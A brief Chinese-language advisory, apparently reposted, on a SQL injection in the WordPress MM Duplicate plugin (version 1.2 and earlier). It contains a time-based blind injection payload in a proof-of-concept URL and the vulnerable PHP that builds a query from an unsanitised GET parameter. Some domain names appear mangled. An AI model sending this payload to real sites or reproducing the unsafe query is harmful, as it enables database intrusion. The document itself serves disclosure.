标题: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability 作者: Miroslav Stampar (miroslav.stampar(at)gmail测试数据 @stamparm HdhCmsTest2cto测试数据 ) 下载地址: http://downloads.wordpress.org/plugin/mm-duplicate.zip 测试版本: 1.2 (已测) --- 测试方法 --- http://HdhCmsTest2cto测试数据 /index.php?duplicate=1&post=-1 AND 1=IF(2>1,BENCHMARK(5000000, MD5 (CHAR(115,113,108,109,97,112))),0) --------------- 缺陷代码分析 --------------- class mm_duplicate_pages_posts { ... function mm_duplicate_pages_posts() { ... add_action('init', array(&$this, 'dup')); ... } function dup() { if($_GET['duplicate']) { $id = $_GET['post']; $dup = new mm_duplicate(); ... $dup->duplicate_post_page($id); } } ... } class mm_duplicate { function duplicate_post_page($id) { ... $select = "select * from ".$wpdb->prefix."postmeta where post_id = $id"; ... } ... }
修复:过滤
查看更多关于WordPress插件MM Duplicate <= 1.2 SQL注射缺陷及修复的详细内容...